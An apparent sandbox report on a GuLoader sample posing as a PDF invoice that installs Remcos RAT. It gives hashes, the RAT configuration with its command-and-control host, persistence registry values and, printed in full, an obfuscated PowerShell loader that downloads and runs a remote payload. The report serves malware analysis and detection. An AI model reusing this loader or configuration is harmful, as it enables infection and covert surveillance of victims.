guloader | 364702ebab29d8422e3612ab66ff2732d1a45153a6a969a6d09b0b341d1a6366

Resubmissions

16/11/2023, 11:23

231116-ng72sacd8t 10

15/11/2023, 13:03

231115-qavh8aah89 10

Analysis

max time kernel
150s
max time network
132s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
15/11/2023, 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Faktura_21110498774987·pdf.vbe
Size

251KB
MD5

c2d91d1d271983f5d3ddcc6229d572f1
SHA1

42214503d23d5f889b2ca926b9b56971fe593fc2
SHA256

18b75005950d9e39a1eb5ce18453e23e00ddecb2ac941967686f8a27b2db9ef9
SHA512

9ba3fbd35d1d2d01815be68858d3225968bc4265f15a9fcf8430fbff38c9e024feb5dc0088fcedc7be831947f98018c4ff0e9035e1aabc64bb68abccaac8c6be
SSDEEP

6144:jbMIJnEsivnLMFiPP1Yq4zCfB+GS7OjwM3aECUXmk:fMRngIP154+3wM3ruk

Score

10^/10

guloader remcos remotehost downloader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-42EOAE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Windows\CurrentVersion\Run\Safa = "%Poka4% -w 1 $Folke=(Get-ItemProperty -Path 'HKCU:\\Trutin\\').Apocryp;%Poka4% ($Folke)"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1568	wab.exe
1568	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3044	powershell.exe
1568	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3044 set thread context of 1568	3044	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2588	powershell.exe
3044	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2136 wrote to memory of 2588	2136	WScript.exe	31
PID 2136 wrote to memory of 2588	2136	WScript.exe	31
PID 2136 wrote to memory of 2588	2136	WScript.exe	31
PID 2588 wrote to memory of 3044	2588	powershell.exe	33
PID 2588 wrote to memory of 3044	2588	powershell.exe	33
PID 2588 wrote to memory of 3044	2588	powershell.exe	33
PID 2588 wrote to memory of 3044	2588	powershell.exe	33
PID 3044 wrote to memory of 1568	3044	powershell.exe	34
PID 3044 wrote to memory of 1568	3044	powershell.exe	34
PID 3044 wrote to memory of 1568	3044	powershell.exe	34
PID 3044 wrote to memory of 1568	3044	powershell.exe	34
PID 3044 wrote to memory of 1568	3044	powershell.exe	34
PID 3044 wrote to memory of 1568	3044	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_21110498774987·pdf.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Sout ([String]$Stumbler){$Nonmeatf = 8;$Yonicemb = ($Stumbler | Measure-Object -Character).Characters;For ($Hitteba=7; $Hitteba -lt $Yonicemb-1; $Hitteba+=$Nonmeatf){$udmrkels=$udmrkels+$Stumbler.Substring($Hitteba, 1)};$udmrkels;}$Noetianin=Sout ' Udstrah Ufoaibt PicrabtPrebetrpLexicols Aladfa:Loadabl/Talisma/BuzzlehdIndlsnir OldemoiReinspivBaroniceToiletp.CruddyggfilmfotoLoitereo HammadgkrkommelOprakteeSeminar.detaildcIntrunkoAlluredmCrushin/ DrestpuFagkritc yndigs? AllopheEndebalxNovembepfugleskoIndvindrepimerotVacuits=Desinfod HurlemoStavrovwEsplananImprovilFestskroformygraVarmblodportall&SprogfoiPatientdisolere=udskill1FlashbaLuhjlpsoV Probit0Bacille4Unpendi8EncarnaPFodbaldzFejlbehXIsolatimPremixt-Funesth3Dommerkx LovregSSideslif DebutasSurerfeHDynamosk VoldtgmTilbind3 FingerUJoggingWafmarchmContredoJonbytnD BergelxResowinV Autogr- Narcom3NearsigIAfkorten Ekstrag tantarHresidue ';$udmrkels01=Sout 'fldechoi Landvse ShagraxPerosom ';$Censo= $udmrkels01;$Noncoordi215 = Sout 'Rehumil\DknetatsSpeedboyGrandpasAdminiswUdbringoSgeordewMoatleg6 Cinder4Triplar\ FinansWSpringfi AudiotnSuppresdKorrekto KontrowRombernsMateshiPMonitoro trickswtabtypeeSiliconrPistoliSTagensvhDiminueeLithogrlInstruelRejicer\Monohybv Udlaan1Omnorme.Abefolk0 Hakkeo\WedderaphovedreoUdseteswTraditieDownshirFrizzessHypoconhFllesklepostinolClaricelLensing.AntagoneIndowedxMeadowyeMercech ';& ($udmrkels01) (Sout 'Antifas$ FandanISapphirnLssalgetGrillkur YarbdiistockisnStrithasBrnebidi UnsecucKnaphul1Labiode9Shiitic2Etherea= Polyga$Unlistse KlapsdnswardedvUroligh:CronhamwChicletiStrmpebnProflogdSporogoiMusefldrDugouta ') ;& ($udmrkels01) (Sout 'Tilsvin$GavflabNPictskio IndrulnBrtsejlcJordfstoHvidbogoFestrelrStemmefd ModpariKomafor2Myograp1Slemmes5 Inkuba=Vandkan$ GeneraI Spilton AssuratDogfishrTermogriNonresonAutoxidsRevnendiGnotobic Dresse1Mineral9Underbi2Kundgjo+Turedea$EdderfuNMyriadeoKlimaernTeleslycPardalho ForlysoFjordrerskolelgdKommunii Resfor2Subtorr1 Scribb5Carligs ') ;. ($udmrkels01) (Sout 'Postrac$SendsoloReisolavErnoutkepaagaaer ReclassBountifeDisadvacUnmanipuHulkenerUnmimete Soloen sprigge=Rteblom Carburi(Signifi(AmericogGonzocrwOversupm ClaybaiGlosehf ildsluwKanonfoi Cadencn Langra3Pelargi2Turnbac_ImputabpMultimarOpfindeoSemideicThermole PerfersBravestsUdtydni Arkaise-TappethFStrudsp HyponeuPRestaterLouteruoSiumspacNdbremseMoanfulsBaandtlsHolytidISeerenbdShippin=Anatopi$Telyndi{SkrivehP PuerpeINaaedecDfalsnin}Tauroco)Noncons. UtrnedC UlcersoDollarfmFreeingm Leukota Spinogn UdlndidInfernaLRagweediRetrofinSubjecteSiliciu)Ingrate Sanktha-RearressDitrochpMonstrolKnipliniLatterat Radioc Cylinde[UnmouthcBukketohGennemsa Intermrstipate]Nebular3Forgaar4anaktor ');. ($udmrkels01) (Sout 'budskab$ SpildtdCatersqiUsdeligrTrapmakeDusinmekSnowlant PaletkiKommuniounelabonSituatisDiploma Adloed=Interes Sheepho$FlovseroFrknensvAccelereringridrIdleshisBlottedegadidaec KarikauPyromucrAgerkaaeSkaftev[Fiskere$Nonenvio Landstv SyllabeAdminisrSmandsssLatviaseUncolorcKippeanuAnglomarMiscropeGstefor.IslttencTrakkasoFossuleu Paradon DagsortRestric-Veduisn2Bungalo]Liegefu ');& ($udmrkels01) (Sout 'Midtpun$StraffeN SemirioShooncen SaurorsFortrincAgglomeiTarerereChiffonnForsvartholethnioverpol= Crafte(keelhauTKommandeKursusssEnighedtForfgte-SmaatinPSprogrgaParafertKoldblohGoffere Overspr$LdervinNSvarteuoSlofbifnLeggeracTrfningoSlvfolioNoncontrDefaitidAnmodeniAmtsraa2Pretann1Soldend5Smaabor)Advices Forward-BondedaAAbbedien MentaldBelaces Lightha(Fyrreaa[ArniroiIOverlapnBartisatHyperpuPCirkustt Prelitr Parabo]swordma: Rapall:MonastisKonvertiDroemmezSeemersebilkonc Fordriv-SkatteieParalyzq Tannab Telope8 Lexicd)Mentali ') ;if ($Nonscienti) {. $Noncoordi215 $direktions;} else {;$udmrkels00=Sout 'LegitimSUncompotForbedraSpecialrNationatSoejlen-BlgmrkeB AbricoiluskeretSamplers ProjekTMacroserSkaldyraSikkerhnSpisesksUdskninfCatastaeGirasolrKosakke Underde- StifttSBlaefanoMargenkuChaoriarLuiginicJuttieseOvercam Figurat$BespakeNBarlockoBrickreeNonburdtLidsraaiaholtbeaAtomicinOnanistiDecongenYngelso Lberety-systempDUdenlanePolypfrsNetvrkst ItelmeiFrtidspnVandrepaStigendtPhotociiHomocreoTeleteknfinansl Uheldsv$UnliquiI CurtsenSphagnotLugtgenrSygekasiForligsnParanoisDaskeneiKomponic Unerro1Skamsla9Reinteg2Aftestn ';& ($udmrkels01) (Sout 'Galacto$BromatoIUdjvninnDemyelitNeedlecrGenonemiLinsdisnBarmmacsCroighlislipefocBrombrb1Hjhuset9Maalere2Pomfres=Sammens$ satsmeeStoplygn HomopovDeponer:DeltageaAlacriopTrioecipSarracedKlubhola ElissatSygepleaHorsewh ') ;. ($udmrkels01) (Sout 'PreconiICurdlinmUndiminpkaareskoArbejdsrUnpatrot Surger-PredefrMUdflyttoThruvild Cataphuentraill ExpofoeFoenicu ApadanB BantueiRutebilt MdedagsstabelvTSkitsebrLuxivehaRereadsnSternitsCeleborfHbscopoeHvidtlprSofacyk ') ;$Intrinsic192=$Intrinsic192+'\Fennosk.Ami';while (-not $Victa) {. ($udmrkels01) (Sout 'Recchek$PrerecoV NskeliiExcoverc Speciat ulceroaPaddleb= Gloios(RobotisTMinersde Banglas BellistHarpern-SomewhePBrandchaEpikiakt Importh Forbld Regnsko$ SammenITroloven paracetTelefotrMaanedsiAppendenForstensDeadpaniUkristec Parado1Unarmou9Catawam2Locowee)Chanker ') ;& ($udmrkels01) $udmrkels00;. ($udmrkels01) (Sout 'SardoesSUsenetltGennemtaTillgsbrSuccesstDyppels-LkkerbiSIntersulMalemaaeAfkrydseSardiaspGaumsbi Montemt5Polyden ');}. ($udmrkels01) (Sout 'Tragtni$underskTovardspeKlemskrrProduktm UdnyttoKombinasUninhibtSweetenaeuxanthtKurvetrvOrdbill Kowtowe=Nedarve GlobaliGDramaereLuminartBerusep-ConcresCGunthero MentalnGevirertHarrepaerelativnDgnvagttLytteap Nonelec$AftllinIAnagnosnReinstitAubergerUrgoniaiGesandtn AnimatsVelsespiFuglemac Differ1 Sclero9Supernu2 Perich ');& ($udmrkels01) (Sout 'Seismog$EohippuL byportoTanogenvMailieseGuldnldmElaters Siddevo=Prerest Indhold[FodfsteSVacantryInformesUnatonitkivinaneProgrammAloinst.SolcellCOuthowloHaandtrnMansteavShearleeIsolatir SutteftVrtshus]Loosemo:Umisken:BenzoylF Apopler DeuteroOutstepmHarmoniBemprizeaCancernsWainlaueEkspedi6Selvher4InjurieSWatterltFiltetsrInteraci KomprinAfstigngAntioxi( Bevoks$ SdmefuTGoatskieAxillarrHemocoemdriftssoTyphonisUndermatNvnesvea FrekvetBrestolvGalning)Tilsnee ');&($udmrkels01) (Sout 'Paapegn$UnrefunuValedicdCabrettm ViscourSomiklekAutoreneOmdannel BotanisTalmasc2 Hmorid Phaseol= fjerne Stennas[UtaetheS Racedey AkvamasStopgaptIncrueneUddannem impert. TartraT AnimaleFdebysexSedgedttLutesni.InvestlEEkskommnPredeplcTetrakioSelvopfdAlmenejiAprendinWoodwarg Fortyk]Conflat:Additio:ThingumABehovsdSTerminaCRepletiITautonyISufflat.TreacheG Serenae GlucurtErfarinSSrboerntMachicorCafecykiTaarnugnSvrvgtegSatrapy(Taktful$AfkasteL informoUdsprngv PulluleHaggeismfrstega)Bacchic ');& ($udmrkels01) (Sout 'Schepel$FormaguRShakenleudbudetaDiversitEmbedsf=Popishe$UnattenuBrddeskdRattlermImprisor DagsvrkDithemaevertebrl NonmansScroung2Unadjud.DrabblesSeiyukauHypopusbSlotenesDiskredtAntalokrAdresseiVekslcon Undivigcatingt(Whslema Himmeri Detruge2 Fiumar8balanop3Kystvan3Tirress9Dispone8 Kinest, Pinnat2Bedemll0Photogr1Basnses8Forcipe8Kittiwa)Taageho ');& ($udmrkels01) $Reat;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Sout ([String]$Stumbler){$Nonmeatf = 8;$Yonicemb = ($Stumbler | Measure-Object -Character).Characters;For ($Hitteba=7; $Hitteba -lt $Yonicemb-1; $Hitteba+=$Nonmeatf){$udmrkels=$udmrkels+$Stumbler.Substring($Hitteba, 1)};$udmrkels;}$Noetianin=Sout ' Udstrah Ufoaibt PicrabtPrebetrpLexicols Aladfa:Loadabl/Talisma/BuzzlehdIndlsnir OldemoiReinspivBaroniceToiletp.CruddyggfilmfotoLoitereo HammadgkrkommelOprakteeSeminar.detaildcIntrunkoAlluredmCrushin/ DrestpuFagkritc yndigs? AllopheEndebalxNovembepfugleskoIndvindrepimerotVacuits=Desinfod HurlemoStavrovwEsplananImprovilFestskroformygraVarmblodportall&SprogfoiPatientdisolere=udskill1FlashbaLuhjlpsoV Probit0Bacille4Unpendi8EncarnaPFodbaldzFejlbehXIsolatimPremixt-Funesth3Dommerkx LovregSSideslif DebutasSurerfeHDynamosk VoldtgmTilbind3 FingerUJoggingWafmarchmContredoJonbytnD BergelxResowinV Autogr- Narcom3NearsigIAfkorten Ekstrag tantarHresidue ';$udmrkels01=Sout 'fldechoi Landvse ShagraxPerosom ';$Censo= $udmrkels01;$Noncoordi215 = Sout 'Rehumil\DknetatsSpeedboyGrandpasAdminiswUdbringoSgeordewMoatleg6 Cinder4Triplar\ FinansWSpringfi AudiotnSuppresdKorrekto KontrowRombernsMateshiPMonitoro trickswtabtypeeSiliconrPistoliSTagensvhDiminueeLithogrlInstruelRejicer\Monohybv Udlaan1Omnorme.Abefolk0 Hakkeo\WedderaphovedreoUdseteswTraditieDownshirFrizzessHypoconhFllesklepostinolClaricelLensing.AntagoneIndowedxMeadowyeMercech ';& ($udmrkels01) (Sout 'Antifas$ FandanISapphirnLssalgetGrillkur YarbdiistockisnStrithasBrnebidi UnsecucKnaphul1Labiode9Shiitic2Etherea= Polyga$Unlistse KlapsdnswardedvUroligh:CronhamwChicletiStrmpebnProflogdSporogoiMusefldrDugouta ') ;& ($udmrkels01) (Sout 'Tilsvin$GavflabNPictskio IndrulnBrtsejlcJordfstoHvidbogoFestrelrStemmefd ModpariKomafor2Myograp1Slemmes5 Inkuba=Vandkan$ GeneraI Spilton AssuratDogfishrTermogriNonresonAutoxidsRevnendiGnotobic Dresse1Mineral9Underbi2Kundgjo+Turedea$EdderfuNMyriadeoKlimaernTeleslycPardalho ForlysoFjordrerskolelgdKommunii Resfor2Subtorr1 Scribb5Carligs ') ;. ($udmrkels01) (Sout 'Postrac$SendsoloReisolavErnoutkepaagaaer ReclassBountifeDisadvacUnmanipuHulkenerUnmimete Soloen sprigge=Rteblom Carburi(Signifi(AmericogGonzocrwOversupm ClaybaiGlosehf ildsluwKanonfoi Cadencn Langra3Pelargi2Turnbac_ImputabpMultimarOpfindeoSemideicThermole PerfersBravestsUdtydni Arkaise-TappethFStrudsp HyponeuPRestaterLouteruoSiumspacNdbremseMoanfulsBaandtlsHolytidISeerenbdShippin=Anatopi$Telyndi{SkrivehP PuerpeINaaedecDfalsnin}Tauroco)Noncons. UtrnedC UlcersoDollarfmFreeingm Leukota Spinogn UdlndidInfernaLRagweediRetrofinSubjecteSiliciu)Ingrate Sanktha-RearressDitrochpMonstrolKnipliniLatterat Radioc Cylinde[UnmouthcBukketohGennemsa Intermrstipate]Nebular3Forgaar4anaktor ');. ($udmrkels01) (Sout 'budskab$ SpildtdCatersqiUsdeligrTrapmakeDusinmekSnowlant PaletkiKommuniounelabonSituatisDiploma Adloed=Interes Sheepho$FlovseroFrknensvAccelereringridrIdleshisBlottedegadidaec KarikauPyromucrAgerkaaeSkaftev[Fiskere$Nonenvio Landstv SyllabeAdminisrSmandsssLatviaseUncolorcKippeanuAnglomarMiscropeGstefor.IslttencTrakkasoFossuleu Paradon DagsortRestric-Veduisn2Bungalo]Liegefu ');& ($udmrkels01) (Sout 'Midtpun$StraffeN SemirioShooncen SaurorsFortrincAgglomeiTarerereChiffonnForsvartholethnioverpol= Crafte(keelhauTKommandeKursusssEnighedtForfgte-SmaatinPSprogrgaParafertKoldblohGoffere Overspr$LdervinNSvarteuoSlofbifnLeggeracTrfningoSlvfolioNoncontrDefaitidAnmodeniAmtsraa2Pretann1Soldend5Smaabor)Advices Forward-BondedaAAbbedien MentaldBelaces Lightha(Fyrreaa[ArniroiIOverlapnBartisatHyperpuPCirkustt Prelitr Parabo]swordma: Rapall:MonastisKonvertiDroemmezSeemersebilkonc Fordriv-SkatteieParalyzq Tannab Telope8 Lexicd)Mentali ') ;if ($Nonscienti) {. $Noncoordi215 $direktions;} else {;$udmrkels00=Sout 'LegitimSUncompotForbedraSpecialrNationatSoejlen-BlgmrkeB AbricoiluskeretSamplers ProjekTMacroserSkaldyraSikkerhnSpisesksUdskninfCatastaeGirasolrKosakke Underde- StifttSBlaefanoMargenkuChaoriarLuiginicJuttieseOvercam Figurat$BespakeNBarlockoBrickreeNonburdtLidsraaiaholtbeaAtomicinOnanistiDecongenYngelso Lberety-systempDUdenlanePolypfrsNetvrkst ItelmeiFrtidspnVandrepaStigendtPhotociiHomocreoTeleteknfinansl Uheldsv$UnliquiI CurtsenSphagnotLugtgenrSygekasiForligsnParanoisDaskeneiKomponic Unerro1Skamsla9Reinteg2Aftestn ';& ($udmrkels01) (Sout 'Galacto$BromatoIUdjvninnDemyelitNeedlecrGenonemiLinsdisnBarmmacsCroighlislipefocBrombrb1Hjhuset9Maalere2Pomfres=Sammens$ satsmeeStoplygn HomopovDeponer:DeltageaAlacriopTrioecipSarracedKlubhola ElissatSygepleaHorsewh ') ;. ($udmrkels01) (Sout 'PreconiICurdlinmUndiminpkaareskoArbejdsrUnpatrot Surger-PredefrMUdflyttoThruvild Cataphuentraill ExpofoeFoenicu ApadanB BantueiRutebilt MdedagsstabelvTSkitsebrLuxivehaRereadsnSternitsCeleborfHbscopoeHvidtlprSofacyk ') ;$Intrinsic192=$Intrinsic192+'\Fennosk.Ami';while (-not $Victa) {. ($udmrkels01) (Sout 'Recchek$PrerecoV NskeliiExcoverc Speciat ulceroaPaddleb= Gloios(RobotisTMinersde Banglas BellistHarpern-SomewhePBrandchaEpikiakt Importh Forbld Regnsko$ SammenITroloven paracetTelefotrMaanedsiAppendenForstensDeadpaniUkristec Parado1Unarmou9Catawam2Locowee)Chanker ') ;& ($udmrkels01) $udmrkels00;. ($udmrkels01) (Sout 'SardoesSUsenetltGennemtaTillgsbrSuccesstDyppels-LkkerbiSIntersulMalemaaeAfkrydseSardiaspGaumsbi Montemt5Polyden ');}. ($udmrkels01) (Sout 'Tragtni$underskTovardspeKlemskrrProduktm UdnyttoKombinasUninhibtSweetenaeuxanthtKurvetrvOrdbill Kowtowe=Nedarve GlobaliGDramaereLuminartBerusep-ConcresCGunthero MentalnGevirertHarrepaerelativnDgnvagttLytteap Nonelec$AftllinIAnagnosnReinstitAubergerUrgoniaiGesandtn AnimatsVelsespiFuglemac Differ1 Sclero9Supernu2 Perich ');& ($udmrkels01) (Sout 'Seismog$EohippuL byportoTanogenvMailieseGuldnldmElaters Siddevo=Prerest Indhold[FodfsteSVacantryInformesUnatonitkivinaneProgrammAloinst.SolcellCOuthowloHaandtrnMansteavShearleeIsolatir SutteftVrtshus]Loosemo:Umisken:BenzoylF Apopler DeuteroOutstepmHarmoniBemprizeaCancernsWainlaueEkspedi6Selvher4InjurieSWatterltFiltetsrInteraci KomprinAfstigngAntioxi( Bevoks$ SdmefuTGoatskieAxillarrHemocoemdriftssoTyphonisUndermatNvnesvea FrekvetBrestolvGalning)Tilsnee ');&($udmrkels01) (Sout 'Paapegn$UnrefunuValedicdCabrettm ViscourSomiklekAutoreneOmdannel BotanisTalmasc2 Hmorid Phaseol= fjerne Stennas[UtaetheS Racedey AkvamasStopgaptIncrueneUddannem impert. TartraT AnimaleFdebysexSedgedttLutesni.InvestlEEkskommnPredeplcTetrakioSelvopfdAlmenejiAprendinWoodwarg Fortyk]Conflat:Additio:ThingumABehovsdSTerminaCRepletiITautonyISufflat.TreacheG Serenae GlucurtErfarinSSrboerntMachicorCafecykiTaarnugnSvrvgtegSatrapy(Taktful$AfkasteL informoUdsprngv PulluleHaggeismfrstega)Bacchic ');& ($udmrkels01) (Sout 'Schepel$FormaguRShakenleudbudetaDiversitEmbedsf=Popishe$UnattenuBrddeskdRattlermImprisor DagsvrkDithemaevertebrl NonmansScroung2Unadjud.DrabblesSeiyukauHypopusbSlotenesDiskredtAntalokrAdresseiVekslcon Undivigcatingt(Whslema Himmeri Detruge2 Fiumar8balanop3Kystvan3Tirress9Dispone8 Kinest, Pinnat2Bedemll0Photogr1Basnses8Forcipe8Kittiwa)Taageho ');& ($udmrkels01) $Reat;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
31cedd1230f7e6d401e3207500a93ba7

SHA1
82a310a06e24997e1b99b9e747b5485568c5938d

SHA256
4413c79589f5de7b1f0d7c264e1f9e2d82eaffc7aad698993fbcebe09813ec31

SHA512
c66b086e0e5405b3877a671ab705c75fd8a3b5bfaff57e1363f40d4da16ef5a1cc7da3072cb251f07c2d5510337195721c4a915c8cdd5a04947b0fd2c9bd1bfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF2D7.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FEH5HFJCZCR3JAD51D4B.temp

Filesize
7KB

MD5
eff5255dc02b48438e59ec3892456803

SHA1
7967b0da216906a2b158c0df3e990f3113514a44

SHA256
a50058491859d6e48615d8707027c20a075531085f9df9f0590d8dc30db33af6

SHA512
8c379cb4bcbf4026aa77dd134e7c829a8ac3752ebebf796109cfbd729a6919950a6320683e9bc82015c09f1d946ae72376e7a42f6d83b08aeadd6df8b60f7939

Download Submit
memory/1568-88-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-40-0x0000000077CA0000-0x0000000077E49000-memory.dmp

Filesize
1.7MB

Download
memory/1568-107-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-106-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-105-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-104-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-103-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-102-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-101-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-100-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-99-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-97-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-96-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-95-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-94-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-93-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-92-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-90-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-89-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-87-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-86-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-80-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-41-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-85-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-84-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-62-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-63-0x0000000000710000-0x0000000003A16000-memory.dmp

Filesize
51.0MB

Download
memory/1568-65-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-64-0x0000000000710000-0x0000000003A16000-memory.dmp

Filesize
51.0MB

Download
memory/1568-66-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-83-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-69-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-82-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-73-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-71-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-81-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-70-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-74-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-75-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-76-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-77-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-78-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/1568-79-0x000000006FFB0000-0x0000000071012000-memory.dmp

Filesize
16.4MB

Download
memory/2588-8-0x000007FEF62F0000-0x000007FEF6C8D000-memory.dmp

Filesize
9.6MB

Download
memory/2588-72-0x000007FEF62F0000-0x000007FEF6C8D000-memory.dmp

Filesize
9.6MB

Download
memory/2588-9-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2588-10-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2588-5-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/2588-6-0x000007FEF62F0000-0x000007FEF6C8D000-memory.dmp

Filesize
9.6MB

Download
memory/2588-7-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2588-26-0x000007FEF62F0000-0x000007FEF6C8D000-memory.dmp

Filesize
9.6MB

Download
memory/2588-4-0x000000001B380000-0x000000001B662000-memory.dmp

Filesize
2.9MB

Download
memory/2588-27-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
